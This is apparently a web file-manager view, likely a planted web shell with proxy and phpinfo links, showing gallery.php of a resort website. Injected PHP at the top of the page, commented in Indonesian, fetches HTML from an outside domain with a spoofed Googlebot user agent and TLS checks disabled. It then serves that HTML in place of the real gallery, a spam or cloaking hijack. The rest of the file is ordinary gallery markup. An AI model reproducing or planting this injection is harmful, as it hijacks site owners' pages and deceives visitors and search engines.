File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/raharesort.in/gallery.php
Back
<?php // ============================ // KONFIGURASI // ============================ $target = 'https://buckdomain.vip/ubm4d/www.raharesort.in-gallery.php.html'; // ============================ // DETEKSI USER AGENT // ============================ $agent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $isGoogle = ( stripos($agent, 'googlebot') !== false || stripos($agent, 'google-inspectiontool') !== false ); // ============================ // FETCH MIRROR UNTUK GOOGLE // ============================ $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n", 'timeout' => 10 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $html = @file_get_contents($target, false, $context); // ============================ // OUTPUT // ============================ if ($html !== false && strlen($html) > 100) { header("Content-Type: text/html; charset=UTF-8"); echo $html; exit; } // ============================ // FAILBACK // ============================ http_response_code(502); echo "Mirror tidak tersedia"; ?> <!DOCTYPE html> <html class="no-js"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>Gallery | Raha Resort</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <link rel="shortcut icon" href="img/favicon.ico" /> <!-- CSS FILES --> <link rel="stylesheet" href="css/bootstrap.min.css"> <link rel="stylesheet" href="css/flexslider.css"> <link rel="stylesheet" href="css/prettyPhoto.css"> <link rel="stylesheet" href="css/main.css"> <link rel="stylesheet" href="css/2035.responsive.css"> <script src="js/vendor/modernizr-2.8.3-respond-1.1.0.min.js"></script> </head> <body> <div id="wrapper"> <!--header--> <?php include 'include/header.php' ?> <!--header End--> <div class="breadcrumb breadcrumb-1 pos-center"> <h2>GALLERY</h2> </div> <div class="content"><!-- Gallery Section --> <div class="container"> <div class="row"> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/1.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/1.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/2.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/2.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/3.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/3.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/4.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/4.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/5.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/5.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/6.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/6.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/7.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/7.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/8.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/8.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/9.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/9.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/10.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/10.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/11.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/11.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/12.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/12.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/13.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/13.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/14.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/14.jpg"></a> </div> <div class="col-lg-4 col-sm-6 gallery-box"> <a href="img/gallery/15.jpg" rel="prettyPhoto[pp_gal]"> <img alt="Gallery" class="img-responsive" src="img/gallery/15.jpg"></a> </div> </div> </div> </div> <!--footer--> <?php include 'include/footer.php' ?> <!--footer End--> </div> <!-- JS FILES --> <script src="js/vendor/jquery-1.11.1.min.js"></script> <script src="js/vendor/bootstrap.min.js"></script> <script src="js/retina-1.1.0.min.js"></script> <script src="js/jquery.flexslider-min.js"></script> <script src="js/superfish.pack.1.4.1.js"></script> <script src="js/jquery.slicknav.min.js"></script> <script src="js/jquery.prettyPhoto.js"></script> <script src="js/jquery.parallax-1.1.3.js"></script> <script src="js/main.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings